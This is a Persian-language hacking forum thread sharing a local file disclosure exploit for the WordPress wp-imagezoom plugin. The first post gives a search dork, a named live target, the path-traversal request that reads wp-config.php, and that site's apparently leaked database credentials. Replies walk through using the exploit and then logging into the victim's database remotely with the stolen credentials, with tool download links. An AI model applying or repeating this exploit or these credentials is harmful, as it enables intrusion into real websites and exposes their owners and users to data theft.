Wp-imagezoom LFD Exploit

جمع کردن
X
 
  • زمان
  • نمایش
پاک کردن همه
پست‌های جدید
  • Mr.XpR
    پیشکسوت
    • May 2012
    • 971

    #1

    Wp-imagezoom LFD Exploit

    [align=LEFT]
    کد:
    Local File Disclosure (LFD)
    
    
    inurl  : wp-content/plugins/wp-imagezoom
    
    Target : http://estanciarural.com/anuncio/wp-content/plugins/wp-imagezoom/
    
    usage  : download.php?file=../../../wp-config.php
    
    
    define('DB_NAME', 'ahosta43_wrdp28');
    /** MySQL database username */
    define('DB_USER', 'ahosta43_wrdp28');
    /** MySQL database password */
    define('DB_PASSWORD', '{OkdhkbQod8W');
    /** MySQL hostname */
    define('DB_HOST', 'localhost');
    /** Database Charset to use in creating database tables. */
    define('DB_CHARSET', 'utf8');
    /** The Database Collate type. Don't change this if in doubt. */
    define('DB_COLLATE', '');
    [/align]
    [align=center][/align]
  • rahrast
    تازه وارد
    • Jul 2012
    • 22

    #2
    RE: Wp-imagezoom LFD Exploit

    چطور میشه از این اکسبلویت در باگ ال اف دی استفاده کرد ؟
    میشه توضیح بدید ؟
    ><><><><><><><><>><NaMe Of GoD><><><><><><><><><

    نظر

    • Moji.Rider
      عضو متعهد
      • Jun 2012
      • 299

      #3
      RE: Wp-imagezoom LFD Exploit

      درود
      ابتدا تارگت خودتون رو انتخاب میکنید حالا چه از طریق دورک پیداش میکنید و یا هرچیز دیگه و سپس به آدرس زیر رفته :
      [align=left]
      کد:
      wp-content/plugins/wp-imagezoom/
      [/align]
      سپس به صفحه ی download.php مراجعه کنید و به شمل زیر، فایل php مورد نظرتون رو مشاهده کنید که هر فایلی میتونه باشه مثل ایندکس و یا کانفیگ :
      [align=left]
      کد:
      download.php?file=../../../file.php
      [/align]
      بدرود..
       
      [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

      همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
       

      نظر

      • Mr.3ler0n
        عضو فعال
        • Jul 2013
        • 71

        #4
        RE: Wp-imagezoom LFD Exploit

        خب ما اینجا تمامی کارها رو انجام دادیم و به کانفیگ دسترسی پیدا کده و آنرا خواندیم. برای وارد شدن به صفحه Php MyAmin چطور باید عمل کنیم؟


        حسین جان یه نرم افزار بود میشه لینک بدی؟ اگر روش دیگه ای هم هست دوستان ذکر کنند متشکریم .... ♥
        نام کاربری و فعالیت مجدد به 3cure تعلق و تغییر یافت...

        نظر

        • Mr.XpR
          پیشکسوت
          • May 2012
          • 971

          #5
          RE: Wp-imagezoom LFD Exploit

          اگر قابلیت ریموت از سمت سرور محدود نباشه میتونی ریموت connect بشی ، اگر phpmyadmin روی سرور باز باشه یا با پورت 3306 یا url

          کد:
          site.com/phpmyadmin
          site.com:3306
          باز هم میتونی متصل بشی از طریق یوزر و پس دیتابیسی که از کانفیگ گرفتی .

          اون نرم افزار هم SQL YOG نام داره که میتونی از لینک زیر دریافت کنی :

          نسخه 32 بیتی :

          http://uploaderx.persiangig.com/tools/SQLYog.Ultimate.11.1.1.0_32_bit.zip

          نسخه 64 بیتی :

          http://uploaderx.persiangig.com/tools/SQLYog.Ultimate.11.1.1.0_64_bit.zip

          ابزار های بیشتر هم در قسمت :

          http://iranhack.com/tools
          [align=center][/align]

          نظر

          در حال کار...